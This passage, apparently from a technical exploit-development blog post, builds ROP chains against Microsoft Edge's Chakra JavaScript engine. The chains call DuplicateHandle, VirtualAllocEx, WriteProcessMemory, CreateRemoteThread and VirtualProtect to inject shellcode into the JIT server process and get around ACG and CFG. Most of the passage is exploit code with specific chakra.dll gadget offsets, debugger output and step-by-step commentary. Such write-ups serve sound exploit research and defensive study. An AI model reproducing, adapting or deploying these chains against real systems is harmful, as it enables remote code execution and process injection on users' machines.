// Stage 2 -> Allocate memory in the Edge JIT process (we have a full handle there now)

// DWORD flAllocationType (R9)
// MEM_RESERVE (0x00002000) | MEM_COMMIT (0x00001000)
0:031> ? 0x00002000 | 0x00001000 
Evaluate expression: 12288 = 00000000`00003000
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00003000, 0x00000000);             // MEM_RESERVE | MEM_COMMIT
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28

// SIZE_T dwSize (R8)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00001000, 0x00000000);             // 0x1000 (shellcode size)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x24628b, chakraHigh);      // 0x18024628b: mov r8, rdx ; add rsp, 0x48 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48

// LPVOID lpAddress (RDX)
// Let VirtualAllocEx decide where the memory will be located
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // NULL address (let VirtualAllocEx deside where we allocate memory in the JIT process)

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which will hold full perms handle to JIT server
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
next();                                                                     				   // Recall RAX already has a writable pointer in it

// Call KERNELBASE!VirtualAllocEx
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0xff00, kernelbaseHigh); // KERNELBASE!VirtualAllocEx address 
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!VirtualAllocEx)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!VirtualAllocEx - 0x180243949: add rsp, 0x38 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)         
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000004, 0x00000000);             // DWORD flProtect (RSP+0x28) (PAGE_READWRITE)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38

// WriteProcessMemory() ROP chain
// Stage 3 -> Write our shellcode into the JIT process

// Store the VirtualAllocEx return address in the .data section of kernelbase.dll (It is currently in RAX)

0:015> dq kernelbase+0x216000+0x4000 L2
00007fff`58cfa000  00000000`00000000 00000000`00000000
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000, kernelbaseHigh); // .data section of kernelbase.dll where we will store VirtualAllocEx allocation
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);       // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)

// SIZE_T nSize (R9)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00001000, 0x00000000);             // SIZE_T nSize (0x1000)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which holds our full perms handle to JIT server
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
next();                                                                     // Recall RAX already has a writable pointer in it

// LPVOID lpBaseAddress (RDX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000-0x8, kernelbaseHigh); // .data section of kernelbase.dll where we have our VirtualAllocEx allocation
next();                                                                            // (-0x8 to compensate for below where we have to read from the address at +0x8 offset
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x255fa0, chakraHigh);      // mov rdx, qword [rdx+0x08] ; mov rax, rdx ; ret

// LPCVOID lpBuffer (R8) (shellcode in chakra.dll .data section)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);         // 0x180576231: pop r8 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74b000, chakraHigh);    	  // .data section of chakra.dll holding our shellcode

// Call KERNELBASE!WriteProcessMemory
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x79a40, kernelbaseHigh); // KERNELBASE!WriteProcessMemory address 
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!WriteProcessMemory)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!WriteProcessMemory - 0x180243949: add rsp, 0x38 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)         
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // SIZE_T *lpNumberOfBytesWritten (NULL) (RSP+0x28)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38

// CreateRemoteThread() ROP chain
// Stage 4 -> Create a thread within the JIT process, but create it suspended
// This will allow the thread to _not_ execute until we are ready
// LPTHREAD_START_ROUTINE can be set to anything, as CFG will check it and we will end up setting RIP directly later
// We will eventually hijack RSP of this thread with a ROP chain, and by setting RIP to a return gadget our thread, when executed, will return into our ROP chain
// We will update the thread later via another ROP chain to call SetThreadContext()

// This can be any random data, since it will never be executed
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x28b4fe, chakraHigh);	   // 0x180043c63: Anything we want - this will never get executed
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which holds our full perms handle to JIT server
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)

write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // NULL (default security properties)

// SIZE_T dwStackSize (R8)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);      // 0x180576231: pop r8 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // 0 (default stack size)

// Call KERNELBASE!CreateRemoteThread
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0xdcfd0, kernelbaseHigh); // KERNELBASE!CreateRemoteThread
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!CreateRemoteThread)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!CreateRemoteThread - 0x180243949: add rsp, 0x38 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // LPVOID lpParameter (RSP+0x28)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000004, 0x00000000);             // DWORD dwCreationFlags (RSP+0x30) (CREATE_SUSPENDED to avoid executing the thread routine)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // LPDWORD lpThreadId (RSP+0x38)

You’ll notice right off the bat the comment about LPTHREAD_START_ROUTINE can be set to anything, as CFG will check it and we will end up setting RIP directly later. This is very contradictory to what we just said about setting the thread’s entry point to a ROP gadget, and just returning into the stack. I implore the reader to keep this mindset for now, as this is logical to think, but by the end of the blog post I hope it is clear to the reader that is a bit more nuanced than just setting the entry point to a ROP gadget. For now, this isn’t a big deal.

Let’s now see this in action. To make things easier, as we had been using pop rcx as a breakpoint up until this point, we will simply set a breakpoint on our jmp rax gadget and continue executing until we hit our WriteProcessMemory ROP chain (note our jmp rax gadget actually will always be called once before DuplicateHandle. This doesn’t affect us at all and is just mentioned as a point of contention). We will then use pt to execute the call to WriteProcessMemory, until the ret, which will bring us into our CreateRemoteThread ROP chain.

Now that we have hit our CreateRemoteThread ROP chain, we will setup our lpStartAddress parameter, which will go in R9. We will first place a writable address in RAX so that our mov r9, rcx gadget (we will pop our intended value in RCX that we want lpStartAddress to be) will not cause an access violation.

Our call to CreateRemoteThread is in the current state:

	addressof(ret_gadget),		// Function pointer we want to execute (when the thread eventually executes, we want it to just return to the stack)

The next parameter we are going to knock out is the hProcess parameter - which is just the same handle to the JIT server with PROCESS_ALL_ACCESS that we have used several times already.

We can see we used pop to get the address of our JIT handle into RCX, and then we dereferenced RCX to get the raw value of the handle into RCX. We also already had a writable value in RAX, so we β€œbypass” the operation which writes to the memory address contained in RAX (and it doesn’t cause an access violation because the address is writable).

Our call to CreateRemoteThread is now in this state:

	fulljitHandle,			// PROCESS_ALL_ACCESS handle to JIT server we got from DuplicateHandle call
	addressof(ret_gadget),		// Function pointer we want to execute (when the thread eventually executes, we want it to just return to the stack)

After retrieving the handle of the JIT process, our next parameter we will fill in is the lpThreadAttributes parameter - which just requires a value of 0. We can just directly write this value to the stack and use a pop operation to place the 0 value into RDX to essentially give our thread β€œnormal” security attributes.

Easy as you’d like! Our call is now in the following state:

	fulljitHandle,			// PROCESS_ALL_ACCESS handle to JIT server we got from DuplicateHandle call
	addressof(ret_gadget),		// Function pointer we want to execute (when the thread eventually executes, we want it to just return to the stack)

Next up is the dwStackSize parameter. Again, we just want to use the default stack size (recall each thread has its own CPU register state, stack, etc.) - meaning we can specify 0 here.

We are now in the following state:

	fulljitHandle,			// PROCESS_ALL_ACCESS handle to JIT server we got from DuplicateHandle call
	0,				// Default Stack size
	addressof(ret_gadget),		// Function pointer we want to execute (when the thread eventually executes, we want it to just return to the stack)

Since the rest of the parameters will be written to the stack RSP + 0x28, 0x30, 0x38. So, we will now place CreateRemoteThread into RAX and use our write primitive to write our remaining parameters to the stack (setting all to 0 but setting the dwCreationFlags to 4 to create this thread in a suspended state).

Our call is now in its final state:

	fulljitHandle,			// PROCESS_ALL_ACCESS handle to JIT server we got from DuplicateHandle call
	0,				// Default Stack size
	addressof(ret_gadget),		// Function pointer we want to execute (when the thread eventually executes, we want it to just return to the stack)
	NULL,				// No variable needs to be passed
	4,				// CREATE_SUSPENDED (Create the thread in a suspended state)
	NULL 				// Don't return the thread ID (we don't need it)

After executing the call, we get our return value which is a handle to the new thread which lives in the JIT server process.

Running Process Hacker as an administrator and viewing the Handles tab will show our returned handle is, in fact, a Thread handle and refers to the JIT server process.

If we then close out of the window (but not totally out of Process Hacker) we can examine the thread IT (TID) within the Threads tab of the JIT process to confirm where our thread is and what start address it will execute when the thread becomes non-suspended (e.g. resumed).

As we can see, when this thread executes (it is currently suspended and not executing) it will perform a ret, which will load RSP into RIP (or will it? Keep reading towards the end and use critical thinking skills as to why this may not be the case!). Since we will eventually write our final ROP chain to RSP, this will kick off our last ROP chain which will mark our shellcode as RWX. Our next two ROP chains, which are fairly brief, will simply be used to update our final ROP chain. We now have a thread we can control in the process where ACG is disabled - meaning we are inching closer.

WriteProcessMemory ROP Chain (Round 2)

Let’s quickly take a look at our β€œfinal” ROP chain (which currently resides in the content process, where our exploit is executing):

// VirtualProtect() ROP chain (will be called in the JIT process)
write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x577fd4, chakraHigh);         // 0x180577fd4: pop rax ; ret
write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x72E128, chakraHigh);         // .data pointer from chakra.dll with a non-zero value to bypass cmp r8d, [rax] future gadget
write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x46377, chakraHigh);          // 0x180046377: pop rcx ; ret
write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x74e030, chakraHigh);         // PDWORD lpflOldProtect (any writable address -> Eventually placed in R9)
write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0xf6270, chakraHigh);          // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x41414141, 0x41414141);                // Padding for add rsp, 0x28
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x41414141, 0x41414141);                // Padding for add rsp, 0x28
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x41414141, 0x41414141);                // Padding for add rsp, 0x28
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x41414141, 0x41414141);                // Padding for add rsp, 0x28
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x41414141, 0x41414141);                // Padding for add rsp, 0x28
write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x46377, chakraHigh);          // 0x180046377: pop rcx ; ret

// Store the current offset within the .data section into a var
ropoffsetOne = countMe;

write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000000, 0x00000000);                // LPVOID lpAddress (Eventually will be updated to the address we want to mark as RWX, our shellcode)
write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x1d2c9, chakraHigh);          // 0x18001d2c9: pop rdx ; ret
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00001000, 0x00000000);                // SIZE_T dwSize (0x1000)
write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x576231, chakraHigh);         // 0x180576231: pop r8 ; ret
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000040, 0x00000000);                // DWORD flNewProtect (PAGE_EXECUTE_READWRITE)
write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x577fd4, chakraHigh);         // 0x180577fd4: pop rax ; ret
write64(chakraLo+0x74b000+countMe, chakraHigh, kernelbaseLo+0x61700, kernelbaseHigh);  // KERNELBASE!VirtualProtect
write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x272beb, chakraHigh);         // 0x180272beb: jmp rax (Call KERNELBASE!VirtualProtect)
write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x118b9, chakraHigh);          // 0x1800118b9: add rsp, 0x18 ; ret
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x41414141, 0x41414141);                // Padding
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x41414141, 0x41414141);                // Padding
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x41414141, 0x41414141);                // Padding
write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x4c1b65, chakraHigh);         // 0x1804c1b65: pop rdi ; ret

// Store the current offset within the .data section into a var
ropoffsetTwo = countMe;

write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000000, 0x00000000);                // Will be updated with the VirtualAllocEx allocation (our shellcode)
write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x1ef039, chakraHigh);         // 0x1801ef039: push rdi ; ret (Return into our shellcode)

This is a VirtualProtect ROP chain, which will mark the target pages as RWX. As we know we cannot directly allocate and execute RWX pages via remote injection (VirtualAllocEx -> WriteProcessMemory -> CreateRemoteThread). So, instead, we will eventually leak the stack of our remote thread that exists within the JIT process (where ACG is disabled). When we resume the thread, our ROP chain will kick off and mark our shellcode as RWX. However, there is a slight problem with this. Let me explain.

We know our shellcode resides in the JIT process at whatever memory address VirtualAllocEx decided. However, our VirtualProtect ROP chain (shown above and at the beginning of this blog post) was embedded within the .data section of the content process (in order to store it, so we can inject it later when the time comes). The issue we are facing is that of a β€œruntime problem” as our VirtualProtect ROP chain has no way to know what address our shellcode will reside in via our VirtualAllocEx ROP chain. This is not only because the remote allocation occurs after we have β€œpreserved” our VirtualProtect ROP chain, but also because when VirutalAllocEx allocates memory, we request a β€œprivate” region of memory, which is β€œrandomized”, and is subject to change after each call to VirtualAllocEx. We can see this in the following gadget:

write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x46377, chakraHigh);          // 0x180046377: pop rcx ; ret
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000000, 0x00000000);                // LPVOID lpAddress (Eventually will be updated to the address we want to mark as RWX, our shellcode)

The above snippet is from our VirtualProtect ROP chain. When this ROP chain is stored before our massive multiple ROP chains we have been walking through, starting with DuplicateHandle and overwriting our return address, the VirtualProtect ROP chain has no way to know where our shellcode is going to end up. lpAddress is a parameter that requires…

The address of the starting page of the region of pages whose access protection attributes are to be changed.

The shellcode, which we inject into the remote JIT process, is the lpAddress we want to mark as RWX eventually. However, our VirtualProtect ROP chain just uses a placeholder for this value. What we are going to do is use another call to WriteProcessMemory to update this address, at our exploit’s runtime. You’ll also notice the following snippet:

// Store the current offset within the .data section into a var
ropoffsetOne = countMe;

These are simply variables (ropoffsetOne, ropoffsetTwo, ropBegin) that save the current location of our β€œcounter”, which is used to easily write gadgets 8 bytes at a time (we are on a 64-bit system, every pointer is 8 bytes). We β€œsave” the current location in the ROP chain in a variable to allow us to easily write to it later. This will make more sense when we see the full call to WriteProcessMemory via ROP.

Here is how this call is setup:

	(HANDLE)0xFFFFFFFFFFFFFFFF, 				// Pseudo handle to the current process (the content process, when the exploit is executing)
	addressof(VirtualProtectROPChain_offset),		// Address of our return value from VirtualAllocEx (where we want to write the VirtualAllocEx_allocation address to)
	addressof(VirtualAllocEx_Allocation),			// Address of our VirtualAllocEx allocation (where our shellcode resides in the JIT process at this point in the exploit)
	0x8							// 64-bit pointer size (sizeof(QWORD)))
	NULL 							// Optional

Our ROP chain simply will write the address of our shellcode, in the remote JIT process (allocated via VirtualAllocEx) to our β€œfinal” VirtualProtect ROP chain so that the VirtualProtect ROP chain knows what pages to mark RWX. This is achieved via ROP, as seen below (including all previous ROP chains):

// alert() for debugging

// Store the value of the handle to the JIT server by way of chakra!ScriptEngine::SetJITConnectionInfo (chakra!JITManager+s_jitManager+0x8)
jitHandle = read64(chakraLo+0x74d838, chakraHigh);

// Helper function to be called after each stack write to increment offset to be written to
function next()

// Begin ROP chain
// Since __fastcall requires parameters 5 and so on to be at RSP+0x20, we actually have to put them at RSP+0x28
// This is because we don't push a return address on the stack, as we don't "call" our APIs, we jump into them
// Because of this we have to compensate by starting them at RSP+0x28 since we can't count on a return address to push them there for us

// DuplicateHandle() ROP chain
// Stage 1 -> Abuse PROCESS_DUP_HANDLE handle to JIT server by performing DuplicateHandle() to get a handle to the JIT server with full permissions
// ACG is disabled in the JIT process
// https://bugs.chromium.org/p/project-zero/issues/detail?id=1299

// Writing our ROP chain to the stack, stack+0x8, stack+0x10, etc. after return address overwrite to hijack control-flow transfer

// HANDLE hSourceProcessHandle (RCX) _should_ come first. However, we are configuring this parameter towards the end, as we need RCX for the lpTargetHandle parameter

// HANDLE hSourceHandle (RDX)
// (HANDLE)-1 value of current process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0xffffffff, 0xffffffff);             // Pseudo-handle to current process

// HANDLE hTargetProcessHandle (R8)
// (HANDLE)-1 value of current process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x24628b, chakraHigh);      // 0x18024628b: mov r8, rdx ; add rsp, 0x48 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48

// LPHANDLE lpTargetHandle (R9)
// This needs to be a writable address where the full JIT handle will be stored
// Using .data section of chakra.dll in a part where there is no data
0:053> dqs chakra+0x72E000+0x20010
00007ffc`052ae010  00000000`00000000
00007ffc`052ae018  00000000`00000000
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72e128, chakraHigh);      // .data pointer from chakra.dll with a non-zero value to bypass cmp r8d, [rax] future gadget
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which will hold full perms handle to JIT server;
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28

// HANDLE hSourceProcessHandle (RCX)
// Handle to the JIT process from the content process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
